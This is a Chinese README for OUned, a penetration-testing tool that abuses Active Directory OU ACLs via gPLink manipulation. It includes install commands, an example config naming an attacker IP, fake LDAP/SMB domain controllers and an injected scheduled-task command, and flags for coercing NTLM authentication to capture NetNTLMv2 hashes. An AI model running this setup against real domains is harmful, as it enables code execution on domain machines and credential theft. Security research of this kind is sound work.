OUned 项目是一个漏洞利用工具,可通过 gPLink 操作自动化滥用组织单位 (Organizational Unit) 的 ACL。
有关攻击原理、必要环境搭建以及工具使用方法的详细说明,请参阅相关文章: https://www.synacktiv.com/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory
可以通过克隆仓库并安装依赖来完成安装:
$ git clone https://github.com/synacktiv/OUned
$ python3 -m pip install -r requirements.txt
OUned 的参数通过配置文件提供——仓库中提供了一个示例文件 config.example.ini。
每一项都由注释说明,但有关详细的配置说明,请参阅上文介绍中提到的文章。
[GENERAL]
# The target domain name
domain=corp.com
# The target DC. If not specified, defaults to the domain name
#dc=192.168.123.10
# The Distinguished Name of the target container
containerDN=OU=SERVERS,DC=corp,DC=com
# The username and password of the user having write permissions on the gPLink attribute of the target container
username=naugustine
password=Password1
# The IP address of the attacker machine on the internal network
attacker_ip=192.168.123.16
# The command that should be executed by child objects. Specifying a command will inject an immediate Scheduled Task
command=whoami > C:\poc.txt
# Alternatively to the 'command' option, you can provide a module file with the GroupPolicyBackdoor syntax - see https://github.com/synacktiv/GroupPolicyBackdoor/wiki. 'Command' and 'module' are mutually exclusive
# module=Scheduledtask_add_computer.ini
# The kind of objects targeted ("computer" or "user")
target_type=computer
[LDAP]
# The IP address of the dummy domain controller that will act as an LDAP server
ldap_ip=192.168.125.245
# Optional (used for sanity checks) - the hostname of the dummy domain controller
ldap_hostname=WIN-TTEBC5VH747
# The username and password of a domain administrator on the dummy domain controller
ldap_username=ldapadm
ldap_password=Password1!
# The ID of the GPO (can be empty, only needs to exist) on the dummy domain controller
gpo_id=7B7D6B23-26F8-4E4B-AF23-F9B9005167F6
# The machine account name and password on the target domain that will be used to fake the LDAP server delivering the GPC
ldap_machine_name=OUNED$
ldap_machine_password=some_very_long_random_password
[SMB]
# The SMB mode can be embedded or forwarded depending on the kind of object targeted
smb_mode=embedded
# The name of the SMB share. Can be anything for embedded mode, should match an existing share on SMB dummy domain controller for forwarded mode
share_name=synacktiv
# The IP address of the dummy domain controller that will act as a SMB server. Only useful in forwarded mode
#smb_ip=192.168.126.206
# The username and password of a user having write access to the share on the SMB dummy domain controller. Only useful in forwarded mode
#smb_username=smbadm
#smb_password=Password1!
# The machine account name and password on the target domain that will be used to fake the SMB server delivering the GPT. Only useful in forwarded mode
#smb_machine_name=OUNED2$
#smb_machine_password=some_very_long_random_password
运行 OUned 时唯一必需的参数是 --config 标志,用于指定配置文件的路径。
--just-coerce 和 coerce-to 标志用于 SMB 认证强制模式;在该模式下,OUned 将强制 OU 子对象向指定目标进行 SMB 认证——更多详细信息请参阅引言中链接的文章。
关于 --just-clean 标志,请参阅下一节。
python3 OUned.py --help
Usage: OUned.py [OPTIONS]
╭─ Options ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ * --config TEXT The configuration file for OUned [default: None] [required] │
│ --skip-checks Do not perform the various checks related to the exploitation setup │
│ --just-coerce Only coerce SMB NTLM authentication of OU child objects to the destination specified in the --coerce-to flag, or, if no destination is │
│ specified, to a local SMB server that will print their NetNTLMv2 hashes │
│ --coerce-to TEXT Coerce child objects SMB NTLM authentication to a specific destination - this argument should be an IP address [default: None] │
│ --just-clean This flag indicates that OUned should only perform cleaning actions from specified cleaning-file │
│ --cleaning-file TEXT The path to the cleaning file in case the --just-clean flag is used [default: None] │
│ --verbose Enable verbose output │
│ --help Show this message and exit. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
默认情况下,如文章所述,OUned 会执行清理操作,其中包括恢复目标域中原始的 gPLink 值。如果漏洞利用流程未能正常退出,OUned 会在每次执行漏洞利用时创建一个清理文件,之后可使用 --just-clean 标志来恢复合法值;例如:
$ python3 OUned.py --config config.example.ini --just-clean --cleaning-file cleaning/FINANCE/2024_04_14-05_02_46.txt